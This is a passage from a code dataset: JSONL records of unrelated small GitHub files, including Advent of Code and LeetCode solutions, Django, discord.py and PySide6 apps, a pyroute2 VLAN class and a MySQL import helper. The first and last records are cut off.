instructions[index].split(',')\nprint(my_ticket)\n\nindex += 3\n\ninvalid_nums = []\ninvalid_indices = [39, 42, 46, 48, 49, 53, 61, 63, 64, 65, 69, 74, 77, 80, 94, 98, 102, 103, 106, 117, 120, 129, 130, 133, 140, 142, 147, 150, 151, 152, 153, 155, 158, 159, 161, 164, 169, 182, 190, 199, 201, 210, 213, 222, 224, 225, 228, 236, 245, 251, 252, 253, 257, 258, 269]\n# invalid_indices = [9,10,11]\n\nnum_fields = len(field_rules)\nfield_validity = {}\nfor field_name in field_rules:\n field_validity[field_name] = list(range(num_fields))\nprint(field_validity)\n\n\n\ndef check_num(num, rules):\n if rules['min1'] <= num <= rules['max1']:\n return True\n if rules['min2'] <= num <= rules['max2']:\n return True\n return False\n\n# Nearby Tickets\nwhile index < len(instructions):\n if index in invalid_indices:\n index += 1\n continue\n\n nums = instructions[index].split(',')\n for field_index, num in enumerate(nums):\n for field, validities in field_validity.items():\n if field_index in validities:\n if not check_num(int(num), field_rules[field]):\n field_validity[field].remove(field_index)\n index+=1\n\nupdated = True\ndone = {}\nwhile updated == True:\n updated = False\n for field, validities in field_validity.items():\n for num in done:\n if num in validities:\n updated = True\n validities.remove(num)\n if len(validities) == 1:\n done[validities[0]] = field\n updated = True\n\nprint(done)\n\nproduct = 1\nfor index, field in done.items():\n if field.startswith('departure'):\n product *= int(my_ticket[index])\n\nprint(product)","repo_name":"casivido/advent_2020","sub_path":"day16/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25686260206","text":"from datetime import datetime, date\nfrom util.tools import format_entity, format_param, format_param_list\nfrom helpers.firestore import FirestoreHelper\nfrom model.kb.inference_engine import rank_content, explain_instance\n\n\"\"\" Multi-task recommender system.\n - Learning-object suggestion:\n . Course\n . 
Article\n\"\"\"\n\ndef teacher_constraint(course_ref, req_teachers):\n \"\"\" Check if at least one of course teachers is also\n present on the teachers requested by the user.\n \"\"\"\n course_teachers = course_ref._data['docentes']\n for course_teacher in course_teachers:\n if course_teacher in req_teachers:\n return True\n\n return False\n\ndef class_datetime_constraint(course_ref, weekdays, start_time, end_time, da_helper):\n \"\"\" Check if at least one of the course \n classes is in a feasible weekday and\n time interval.\n \"\"\"\n\n class_helper = FirestoreHelper(course_ref.reference)\n classes = class_helper.get_collection('oferecimentos', ref=True)\n\n for class_ref in classes:\n for day in weekdays:\n schedule_helper = FirestoreHelper(class_ref.reference)\n filter_schedule = [\n ['dia', '==', '{}'.format(day)], # weekdays[0]\n ]\n schedules = schedule_helper.query('horarios', filter_schedule)\n\n for schedule in schedules:\n # no constraint on time\n if not start_time and not end_time:\n return True\n # check if class meet schedule requirements\n if datetime.strptime(schedule['horario_fim'], \"%H:%M\") <= datetime.strptime(end_time, \"%H:%M\") and datetime.strptime(schedule['horario_inicio'], \"%H:%M\") >= datetime.strptime(start_time, \"%H:%M\"):\n return True\n \n return False\n\ndef get_explanation(params, db, context):\n theme_raw = context[0]['parameters']['theme']\n theme = format_entity(theme_raw)\n\n course = params['Course'].lower()\n\n reasons = explain_instance(course, 'subject', theme)\n\n return 'Recomendo a disciplina {}, pois {}'.format(course, ', '.join(reasons[:3]))\n\ndef get_course_recommendation(params, db):\n\n theme_raw = params['theme']\n theme = format_entity(theme_raw)\n \n k = int(params['suggestion_number']) # nº recommendations\n\n teachers = format_param_list(params['teachers'])\n weekdays = format_param_list(params['weekdays'])\n start_time = None\n end_time = None\n if format_param(params['time_period']):\n start_time = params['time_period']['startTime'][11:-9]\n end_time = params['time_period']['endTime'][11:-9]\n\n courses = rank_content(theme) # KGE link prediction \n\n da_helper = FirestoreHelper(db) # data access helper\n\n recommendations = []\n for course_id in courses[:10]: # Reduce search space\n # stop if enough recommendations have been found\n if len(recommendations) == k:\n break\n\n course_ref = da_helper.get_document('cursos', course_id, ref=True)\n\n # meet teacher requirement\n if len(teachers) > 0 and not teacher_constraint(course_ref, teachers):\n continue\n\n # meet date and time requirements\n if len(weekdays) > 0 and not class_datetime_constraint(course_ref, weekdays, start_time, end_time, da_helper):\n continue\n\n recommendations.append(course_id + ' - ' + course_ref._data['name'])\n\n if len(recommendations) > 1:\n return 'Recomendo as disciplinas: {}'.format(', '.join(recommendations))\n elif len(recommendations) == 1:\n return 'Recomendo a disciplina: {}'.format(', '.join(recommendations))\n else:\n return 'Desculpe, não encontrei disciplinas que atendam as requisitos levantados :('\n\ndef get_article_recommendation(params, db):\n \n return 'get_article_recommendation'\n","repo_name":"gustapp/ganimedes-chatbot","sub_path":"functions/src/handlers/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"797172397","text":"# http://punter.inf.ed.ac.uk/maps/sample.json\n\nimport sys\nfrom 
html.parser import HTMLParser\n\npaths = set()\nfor line in sys.stdin.readlines():\n begin = line.find(\"?map=/map\")\n if begin != -1:\n end = line[begin:].find('.json')\n if end != -1:\n path = \"http://punter.inf.ed.ac.uk\" + line[begin+5:begin+end] + \".json\"\n paths.add(path)\n\nfor path in paths:\n print(path)\n","repo_name":"hasipon/icfpc2017","sub_path":"maps/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29017443160","text":"from fonctions import afficher\n\nfichier = None\n\n'''\nOuvre le fichier spécifié en paramètres. S'il existe, il sera écrasé, autrement, il sera créé.\n@param cheminFichier Le chemin absolu vers le fichier à ouvrir. Ex: \"/home/user/fichier.xml\"\n'''\ndef ouvrirFichier(cheminFichier):\n global fichier\n try:\n fichier = open(cheminFichier, \"w\")\n fichier.write(\"\\n\")\n except IOError as ex:\n print(\"Erreur lors de l'ouverture du fichier :\\n\" + ex.value)\n exit(1)\n \ndef fermerFichier():\n global fichier\n fichier.write(\"\")\n fichier.close()\n \n'''\nAjoute les balises xml permettant d'afficher l'image\n@param nomImage Le nom de l'image à ajouter\n@param cheminImages Le chemin du dossier contenant les images\n@param duree La duree d'affichage de l'image lors du diaporama\n'''\ndef ajouterImage(nomImage, cheminImages, duree):\n global fichier\n fichier.write(\" \\n\")\n fichier.write(\" \" + duree + \"\\n\")\n fichier.write(\" \" + cheminImages + \"/\" + nomImage + \"\\n\")\n fichier.write(\" \\n\")\n afficher(\"Image '\" + nomImage + \"' ajoutée\")","repo_name":"Takiguchi72/GenerateurDiaporamaXml","sub_path":"gestionFichier.py","file_name":"gestionFichier.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16390914097","text":"from email.mime import application\nimport sys\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom PySide6.QtGui import QIcon\nfrom PySide6.QtWidgets import QMainWindow\nfrom PySide6.QtWidgets import QWidget\nfrom PySide6.QtWidgets import QFileDialog\nfrom PySide6.QtWidgets import QMessageBox\nfrom ui import Ui_MainWindow\nfrom controller import *\n\nclass Parser(QtWidgets.QMainWindow):\n def __init__(self):\n super(Parser, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.init_UI()\n self.directory = \"\"\n \n def init_UI(self):\n self.setWindowTitle(\"Osu collector parser\")\n \n self.ui.lineEdit.setPlaceholderText('collection url')\n self.ui.pushButton.clicked.connect(self.download_beatmaps)\n self.ui.pushButton_2.clicked.connect(self.get_save_path)\n \n def get_save_path(self):\n self.directory = str(QFileDialog.getExistingDirectory(self, \"Select Directory\"))\n _translate = QtCore.QCoreApplication.translate\n self.ui.label.setText(_translate(\"MainWindow\", self.directory))\n \n def download_beatmaps(self):\n url = self.ui.lineEdit.text()\n if url != \"\" and self.directory != \"\":\n parse_url_song(url, self.directory+\"/\")\n msg = QMessageBox()\n msg.setText(\"Download is ended!\")\n msg.setWindowTitle(\"Info\")\n msg.setWindowIcon(QtGui.QIcon(\"white tic.png\"))\n msg.setIcon(QMessageBox.Information)\n msg.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n msg.setStyleSheet(\"color: rgb(0, 0, 0);\")\n msg.exec_()\n else:\n msg = QMessageBox()\n msg.setText(\"Please set correct url or directory path\")\n msg.setWindowTitle(\"Warning\")\n 
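# editor note: of the two setStyleSheet calls below, the second replaces the first; merging both rules into a single stylesheet string would keep them both\n            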
msg.setWindowIcon(QtGui.QIcon(\"white tic.png\"))\n msg.setIcon(QMessageBox.Information)\n msg.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n msg.setStyleSheet(\"color: rgb(0, 0, 0);\")\n msg.exec_()\n #QMessageBox.about(self, \"Warning\", \"Please set correct url or directory path!\")\n \n\nif __name__ == '__main__':\n app = QtWidgets.QApplication([])\n application = Parser()\n application.show()\n sys.exit(app.exec())","repo_name":"Millrocious/Osu-Collector-Downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2398585884","text":"from typing import List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n length = len(nums)\n sumOfLen = length*(length+1)//2\n sumOfList = sum(nums)\n ans = sumOfLen - sumOfList\n ans if ans else max(nums) + 1\n return ans\n\n\nobj = Solution()\nprint(f'{obj.missingNumber([9,6,4,2,3,5,7,0,1])}')\n","repo_name":"souradeepta/leetcode-practice","sub_path":"python/268-Missing-Number.py","file_name":"268-Missing-Number.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9415415786","text":"from pyroute2.netlink import nla\n\nflags = {'reorder_hdr': 0x1, 'gvrp': 0x2, 'loose_binding': 0x4, 'mvrp': 0x8}\n\n\nclass vlan(nla):\n prefix = 'IFLA_'\n\n nla_map = (\n ('IFLA_VLAN_UNSPEC', 'none'),\n ('IFLA_VLAN_ID', 'uint16'),\n ('IFLA_VLAN_FLAGS', 'vlan_flags'),\n ('IFLA_VLAN_EGRESS_QOS', 'qos'),\n ('IFLA_VLAN_INGRESS_QOS', 'qos'),\n ('IFLA_VLAN_PROTOCOL', 'be16'),\n )\n\n class vlan_flags(nla):\n fields = (('flags', 'I'), ('mask', 'I'))\n\n class qos(nla):\n prefix = 'IFLA_'\n\n nla_map = (\n ('IFLA_VLAN_QOS_UNSPEC', 'none'),\n ('IFLA_VLAN_QOS_MAPPING', 'qos_mapping'),\n )\n\n class qos_mapping(nla):\n fields = (('from', 'I'), ('to', 'I'))\n","repo_name":"svinota/pyroute2","sub_path":"pyroute2/netlink/rtnl/ifinfmsg/plugins/vlan.py","file_name":"vlan.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"} +{"seq_id":"32343006704","text":"from django.http import HttpResponseRedirect\nfrom django.conf import settings\nfrom models import FormBuilderPreference\n\nclass OtherFormBuilderRedirectMiddleware(object):\n '''\n If the user prefers to use another form builder, redirect to it\n '''\n THIS_BUILDER = FormBuilderPreference.DKOBO\n PREFERENCE_TO_PREFIX = {\n FormBuilderPreference.KPI: settings.KPI_PREFIX,\n FormBuilderPreference.DKOBO: settings.DKOBO_PREFIX,\n }\n\n def _redirect_if_necessary(self, request, preferred_builder):\n preferred_builder_key = preferred_builder.preferred_builder\n preferred_prefix = self.PREFERENCE_TO_PREFIX[preferred_builder_key]\n prefix_length = max(1, len(request.path) - len(request.path_info))\n prefix = request.path[:prefix_length]\n if prefix != preferred_prefix:\n try:\n # Requires Django 1.7\n scheme = request.scheme\n except:\n scheme = 'https' if request.is_secure() else 'http'\n return HttpResponseRedirect(u'{}://{}{}'.format(\n scheme, request.get_host(), preferred_prefix))\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n ''' Using process_view instead of process_request allows the resolver\n to run and return 404 when appropriate, instead of blindly returning\n 302 for all requests '''\n if request.path_info.startswith('/admin/'):\n # 
Never redirect the admin interface\n return\n preferred_builder = self.THIS_BUILDER\n if not settings.KPI_PREFIX or not settings.DKOBO_PREFIX \\\n or request.user.is_anonymous():\n # Do not attempt to redirect if the necessary prefixes are not\n # configured or the user is anonymous\n return\n (preferred_builder, created) = \\\n FormBuilderPreference.objects.get_or_create(user=request.user)\n return self._redirect_if_necessary(request, preferred_builder)\n","repo_name":"kobotoolbox/dkobo","sub_path":"dkobo/hub/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"28212237455","text":"\n\n# Useful functions class (contains as many generic functions as possible -> used in many classes)\nclass Tools(object):\n\n # region Methods\n @staticmethod\n def not_out_of_borders(row, col):\n if row < 8 and row >= 0 and col < 8 and col >= 0:\n return True\n return False\n\n @ staticmethod\n def check_lines(board, row, col, x, y, moves, amount=2, turn=1):\n\n for i in range(1, amount):\n\n if Tools.not_out_of_borders(row + x * i, col + y * i):\n if board[row + x * i][col + y * i] == 0:\n moves.append([row + x * i, col + y * i])\n elif turn == 1 and board[row + x * i][col + y * i] < 0:\n moves.append([row + x * i, col + y * i])\n break\n elif turn == 0 and board[row + x * i][col + y * i] > 0:\n moves.append([row + x * i, col + y * i])\n break\n else:\n break\n else:\n break\n\n @staticmethod\n def all_soldiers_moves(turn, model, board):\n\n soldier_places = []\n soldier_moves = []\n\n # Find all the soldiers on the board and their moves\n\n # black side\n if turn == 0:\n\n # Find soldiers\n\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] < 0:\n soldier_places.append([i, j])\n\n # Find moves\n\n for i in range(len(soldier_places)):\n temp = model.onaction(soldier_places[i][0], soldier_places[i][1], 0, -1, -1, 0)\n soldier_moves.append(temp)\n\n # white side\n else:\n\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] > 0:\n soldier_places.append([i, j])\n\n for i in range(len(soldier_places)):\n temp = model.onaction(soldier_places[i][0], soldier_places[i][1], 0)\n soldier_moves.append(temp)\n\n return soldier_places, soldier_moves\n\n @ staticmethod\n def create_dummy_board(board):\n\n dummy_board = []\n\n for i in range(len(board)):\n\n temp_list = []\n\n for j in range(len(board[i])):\n temp_list.append(board[i][j])\n\n dummy_board.append(temp_list)\n\n return dummy_board\n\n # Print the board\n @staticmethod\n def print_board(board):\n\n for i in board:\n\n print(i)\n\n @staticmethod\n def convert_to_one_dimensional_lists(old_list_places, old_list_moves):\n\n one_d_list_move = []\n one_d_list_places = []\n\n\n for i in range(len(old_list_moves)):\n\n if type(old_list_moves[i]) == list:\n for j in old_list_moves[i]:\n\n one_d_list_move.append(j)\n one_d_list_places.append(old_list_places[i])\n\n return one_d_list_places, one_d_list_move\n\n @staticmethod\n def find_amount_of_soldiers(board):\n\n sum_soldiers = 0\n\n for i in range(8):\n for j in range(8):\n if board[i][j] != 0:\n sum_soldiers += 1\n\n return sum_soldiers\n\n @staticmethod\n def reverse_2d_list(input_list):\n\n # reverese items inside list\n input_list.reverse()\n\n # reverse each item inside the list using map function(Better than doing loops...)\n input_list = list(map(lambda x: x[::-1], input_list))\n\n # return\n return input_list\n # 
endregion","repo_name":"aloni34/Python_Game_Chess_MiniMax","sub_path":"Chess/Utilities/Tools.py","file_name":"Tools.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73842237954","text":"import re\n\ndef add(numbers_string):\n if len(numbers_string)>0:\n # delimiter declaration regex pattern\n dd_pattern = r'//(?P.*)\\n(?P.*)'\n # check if delimiter is declared\n dd_match = re.match(dd_pattern, numbers_string)\n if dd_match:\n # delmiter declaration group dictionary\n dd_dict = dd_match.groupdict()\n delimiters = [dd_dict['delimiter']]\n numbers_string = dd_dict['numbers_string']\n else:\n # list of delimiters\n delimiters = [',', '\\n']\n # delimiter regex of splitting for regex based splitting\n delimiters_regex = '|'.join(map(re.escape, delimiters))\n def neg_except(numbers):\n \"\"\"Raise exception when a number in numbers in negative\"\"\"\n numbers = list(numbers)\n neg_numbers = list(filter(lambda x: x<0, numbers))\n if len(neg_numbers)>0:\n raise(Exception('negatives not allowed ['+','.join(neg_numbers)+']'))\n return numbers\n # list of numbers in the given string\n numbers = map(int, re.split(delimiters_regex, numbers_string))\n # check none of the numbers is negative\n numbers = neg_except(numbers)\n return sum(numbers)\n else:\n return 0\n","repo_name":"starkhv/tdd_kata","sub_path":"day4/string_calculator.py","file_name":"string_calculator.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"332004018","text":"import os\nimport shutil\nimport pathlib\nimport subprocess\n\nimport mysql.connector\n\nfrom contextlib import contextmanager\n\n\nclass LoadDataInFile():\n\n CNF_PRIORITY = \"priority\"\n CNF_REPLACEMENT = \"replacement\"\n CNF_CHARSET = \"charset\"\n CNF_FIELDS_TERMINATED_BY = \"fields_terminated_by\"\n CNF_FIELDS_ENCLOSED_BY = \"fields_enclosed_by\"\n CNF_FIELDS_ESCAPED_BY = \"fields_escaped_by\"\n CNF_LINES_TERMINATED_BY = \"lines_terminated_by\"\n CNF_LINES_STARTING_BY = \"lines_starting_by\"\n CNF_IGNORE_LINES = \"ignore_lines\"\n CNF_COLUMNS = \"columns\"\n CNF_SET = \"set\"\n\n def __init__(self, cache_dir, database, table, config):\n self._cache_dir = cache_dir\n self._database = database\n self._table = table\n self._config = config\n\n @classmethod\n @contextmanager\n def context(cls, **args):\n try:\n cnx = mysql.connector.connect(**args)\n yield cnx\n finally:\n cnx.disconnect()\n\n def run(self, file, ctx_obj):\n conn = ctx_obj\n stmt = self._generate(file.filepath)\n result = conn.cmd_query(stmt)\n return result\n\n def _generate(self, filepath):\n prepared_stmt = \"\"\"\n LOAD DATA {PRIORITY} LOCAL INFILE \\\"{FILE}\\\"\n {REPLACEMENT}\n INTO TABLE {TABLE}\n CHARACTER SET {CHARSET}\n FIELDS\n TERMINATED BY {COLUMNS_TERMINATED_BY}\n ENCLOSED BY {COLUMNS_ENCLOSED_BY}\n ESCAPED BY {COLUMNS_ESCAPED_BY}\n LINES\n STARTING BY {LINES_STARTING_BY}\n TERMINATED BY {LINES_TERMINATED_BY}\n IGNORE {IGNORE_LINES} ROWS\n ({COLUMNS})\n SET {SET}\n \"\"\"\n\n stmt = prepared_stmt.format(\n FILE=filepath,\n PRIORITY=self._config[LoadDataInFile.CNF_PRIORITY],\n TABLE=self._table,\n REPLACEMENT=self._config[LoadDataInFile.CNF_REPLACEMENT],\n CHARSET=self._config[LoadDataInFile.CNF_CHARSET],\n COLUMNS_TERMINATED_BY=self._config[LoadDataInFile.CNF_FIELDS_TERMINATED_BY],\n COLUMNS_ENCLOSED_BY=self._config[LoadDataInFile.CNF_FIELDS_ENCLOSED_BY],\n 
COLUMNS_ESCAPED_BY=self._config[LoadDataInFile.CNF_FIELDS_ESCAPED_BY],\n LINES_STARTING_BY=self._config[LoadDataInFile.CNF_LINES_STARTING_BY],\n LINES_TERMINATED_BY=self._config[LoadDataInFile.CNF_LINES_TERMINATED_BY],\n IGNORE_LINES=self._config[LoadDataInFile.CNF_IGNORE_LINES],\n COLUMNS=self._config[LoadDataInFile.CNF_COLUMNS],\n SET=self._config[LoadDataInFile.CNF_SET]\n )\n\n return stmt\n\n\nclass ImportCommand():\n\n def __init__(self, command, cache_dir, database, table, config):\n self._cmd = command\n self._cache_dir = cache_dir\n self._database = database\n self._table = table\n self._config = config\n\n @contextmanager\n @classmethod\n def context(cls, **args):\n yield None\n\n def run(self, file):\n tmp_filename = '%s.%s' % (self._table, file.filename)\n tmp_filepath = str(pathlib.PurePath(os.getcwd(),\n self._cache_dir,\n tmp_filename))\n\n shutil.copy(file.filepath, tmp_filepath)\n\n cmd = [\n self._cmd,\n '--local',\n '--replace'\n ]\n\n for item in self._config:\n cmd.append('--%s=%s' % (item, self._config[item]))\n\n cmd.append(self._database)\n cmd.append(tmp_filepath)\n\n p = subprocess.run(cmd)\n\n return p.returncode\n","repo_name":"GoPlan/pymysqlbatchimport","sub_path":"mysqlimport.py","file_name":"mysqlimport.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70489384196","text":"from math import ceil\nfrom math import log\n\ndef binary_search(A, low, high, k):\n if high >= low:\n mid = (low + high) // 2\n print(mid)\n if A[mid] is None:\n return binary_search(A, low, mid-1, k)\n if k == A[mid][0]:\n return True, mid\n elif k < A[mid][0]:\n return binary_search(A, low, mid-1, k)\n else:\n return binary_search(A, mid+1, high, k)\n else:\n return False, high, low\n\ndef zad6(A):\n n = len(A)\n B = [None for _ in range(ceil(log(n, 2)))]\n for i in range(n):\n x = binary_search(B, 0, ceil(log(n, 2))-1, A[i])\n if x[0]:\n B[x[1]][1] += 1\n else:\n if B[x[2]] is not None:\n cnt = x[2]\n save = [A[i], 1]\n while cnt < ceil(log(n, 2))-1 and B[cnt] is not None:\n save, B[cnt] = B[cnt+1], save\n cnt += 1\n else:\n B[x[2]] = [A[i], 1]\n i = j = 0\n while i < n:\n A[i] = B[j][0]\n B[j][1] -= 1\n if B[j][1] == 0:\n j += 1\n i += 1\n\nif __name__ == '__main__':\n tab = [1, 2, 3, 4, 1, 2, 3, 5, 1, 1, 1, 2, 3, 5, 5, 3, 3, 2, 1, 1, 4]\n zad6(tab)\n print(tab)\n\n\n","repo_name":"Deevo87/asd-algorithms","sub_path":"sorting/bit_algo_sorting/1.zadanie6.py","file_name":"1.zadanie6.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1337232808","text":"from django.shortcuts import render\nfrom .models import Seller, Country\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom .forms import SellerForm, MatchForm\n\ndef home(request):\n sellers_in_egypt = Seller.objects.filter(country_name='Egypt')\n return render(request, 'home.html', {'sellers_in_egypt': sellers_in_egypt})\n\n### THIS IS SOLELY FOR MILESTONE 2 PROGRESS REPORT\ndef test(request):\n sellers_in_egypt = Seller.objects.filter(country_name='Egypt')\n return render(request, 'test.html', {'sellers_in_egypt': sellers_in_egypt})\n###\n\ndef matchmaker(request):\n\tprices, countries, sortBy = [], [], []\n\tif request.method == 'POST':\n\t\tinfo = MatchForm(request.POST)\n\n\t\tif info.is_valid():\n\t\t\tinfo = info.clean_match_form()\n\t\t\tprices = [info['minPrice'], info['maxPrice']]\n\t\t\tcountries = 
info['countries']\n\t\t\tsortBy = info['sortBy']\n\t\t\tinfo = MatchForm()\n\telse: \n\t\tinfo = MatchForm()\n\n\t# for before the form is submitted\n\tif len(prices) > 0:\n\t\ttable = Seller.objects.filter(price_per_kwh__gte=prices[0], price_per_kwh__lte=prices[1])\n\telse: table = Seller.objects.all()\n\n\tif len(countries) > 0:\n\t\ttable = table.filter(country_name__in=countries)\n\n\tif len(sortBy) == 1:\n\t\t\ttable = table.order_by(sortBy[0])\n\tif len(sortBy) == 2:\n\t\ttable = table.order_by(sortBy[0], sortBy[1])\n\n\treturn render(request, 'matchmaker.html', {'matches': table, 'info': info})\n\ndef newseller(request):\n\tif request.method == 'POST':\n\t\tform = SellerForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/newseller/thankyou/')\n\telse:\n\t\tform = SellerForm()\n\treturn render(request, 'newseller.html', {'form': form})\n\ndef thankyou(request):\n\treturn render(request, 'thankyou.html')\n \ndef countries(request):\n\t\n\thasSeller = []\n\tfor c in Country.objects.all():\n\t\tif (c==s.country_name for s in Seller.objects.all()):\n\t\t\thasSeller.append('yes')\n\t\telse:\n\t\t\thasSeller.append('no')\n\tmyList= zip(Country.objects.values_list('name'), Country.objects.values_list('percent_pop_needs_elec'), hasSeller)\n\treturn render(request, 'countries.html', {'myList': myList})\n\n\n\n \n","repo_name":"justinchristopherperry/projectEnergy","sub_path":"matchmaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8261911508","text":"from discord.ext import commands\nimport discord\nimport asyncio\n\n# shamelessly stolen from https://github.com/Gobot1234/Light-Bot/blob/d6891814f3b75604ff009a3db200c095c159810b/Cogs/help.py#L173\n\n\nclass HelpCommand(commands.HelpCommand):\n def __init__(self):\n super().__init__(command_attrs={\"help\": \"Shows help about the bot, a command, or a cog\"})\n\n def get_command_signature(self, command):\n return \"{0.clean_prefix}{1.qualified_name} {1.signature}\".format(self, command)\n\n async def send_bot_help(self, mapping):\n ctx = self.context\n bot = ctx.bot\n page = -1\n cogs = [name for name, obj in bot.cogs.items() if await discord.utils.maybe_coroutine(obj.cog_check, ctx)\n and name not in (\"owner\", \"CommandErrorHandler\")]\n cogs.sort()\n\n def check(reaction, user):\n return user == ctx.author and help_embed.id == reaction.message.id\n\n embed = await self.bot_help_paginator(page, cogs)\n help_embed = await ctx.send(embed=embed)\n bot.loop.create_task(self.bot_help_paginator_reactor(help_embed))\n\n while 1:\n try:\n reaction, user = await bot.wait_for('reaction_add', timeout=90, check=check) # checks message reactions\n except asyncio.TimeoutError: # session has timed out\n try:\n await help_embed.clear_reactions()\n except discord.errors.Forbidden:\n pass\n break\n else:\n try:\n await help_embed.remove_reaction(str(reaction.emoji), ctx.author) # remove the reaction\n except discord.errors.Forbidden:\n pass\n\n if str(reaction.emoji) == '⏭': # go to the last the page\n page = len(cogs) - 1\n embed = await self.bot_help_paginator(page, cogs)\n await help_embed.edit(embed=embed)\n elif str(reaction.emoji) == '⏮': # go to the first page\n page = -1\n embed = await self.bot_help_paginator(page, cogs)\n await ctx.send(len(embed))\n\n await help_embed.edit(embed=embed)\n\n elif str(reaction.emoji) == '◀': # go to the previous page\n page -= 1\n if 
page == -2: # check whether to go to the final page\n page = len(cogs) - 1\n embed = await self.bot_help_paginator(page, cogs)\n await help_embed.edit(embed=embed)\n elif str(reaction.emoji) == '▶': # go to the next page\n page += 1\n if page == len(cogs): # check whether to go to the first page\n page = -1\n embed = await self.bot_help_paginator(page, cogs)\n await help_embed.edit(embed=embed)\n elif str(reaction.emoji) == '⏹': # delete the message and break from the wait_for\n await help_embed.delete()\n break\n\n async def send_command_help(self, command):\n await self.context.send(\"```\" + command.help + \"```\")\n\n async def bot_help_paginator(self, page: int, cogs) -> discord.Embed:\n ctx = self.context\n bot = ctx.bot\n\n if page == -1:\n embed = discord.Embed(\n title=\"Goldbot | Help\",\n description=\"Goldbot is a multi-purpose bot, written in Python by\\n`Goldbar#5656`\\n\\nFor more information visit:\\n[GitHub Page](https://github.com/Monroeshindelar/Goldbot-py)\",\n color=discord.Color.green()\n )\n\n embed.add_field(name=\"Controls\", value=':track_previous: Goes to the first page\\n'\n ':arrow_backward: Goes to the previous page\\n'\n ':stop_button: Deletes and closes this message\\n'\n ':arrow_forward: Goes to the next page\\n'\n ':track_next: Goes to the last page')\n else:\n cog = bot.get_cog(cogs[page])\n embed = discord.Embed(\n title=\"Goldbot | \" + cog.qualified_name,\n description=cog.description,\n color=discord.Color.green()\n )\n\n for c in cog.walk_commands():\n try:\n if await c.can_run(ctx) and not c.hidden:\n signature = self.get_command_signature(c)\n description = self.get_command_description(c)\n if c.parent:\n embed.add_field(name=f'**╚╡**{signature}', value=description)\n else:\n embed.add_field(name=signature, value=description, inline=False)\n except commands.CommandError:\n pass\n\n embed.set_thumbnail(url=bot.user.avatar_url)\n embed.set_footer(text=\"Page \" + str(page + 2) + \" of \" + str(len(cogs) + 1))\n\n return embed\n\n async def bot_help_paginator_reactor(self, message):\n reactions = (\n '\\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}',\n '\\N{BLACK LEFT-POINTING TRIANGLE}',\n '\\N{BLACK SQUARE FOR STOP}',\n '\\N{BLACK RIGHT-POINTING TRIANGLE}',\n '\\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}'\n )\n for reaction in reactions:\n await message.add_reaction(reaction)\n\n def get_command_description(self, command) -> str:\n \"\"\"Method to return a commands short doc/brief\"\"\"\n if not command.short_doc: # check if it has any brief\n return 'There is no documentation for this command currently'\n else:\n return command.short_doc.format(prefix=self.clean_prefix)","repo_name":"Monroeshindelar/Goldbot-py","sub_path":"cogs/helpcommand.py","file_name":"helpcommand.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32966871631","text":"'''\nReplicate the tensorflow repo smoke test and confirm that the feature extractor\nworks as expected\n'''\nimport numpy as np\nimport torch\n\nfrom torchvggish.model import vggish\nfrom torchvggish.input_process import waveform_to_input\n\n\ndef gen_test_input():\n # Generate a 1 kHz sine wave at 44.1 kHz (we use a high sampling rate\n # to test resampling to 16 kHz during feature extraction).\n num_secs = 3\n freq = 1000\n sample_rate = 44100\n t = np.linspace(0, num_secs, int(num_secs * sample_rate))\n x = np.sin(2 * np.pi * freq * t)\n expected_stats = {\n 'embedding_mean': 
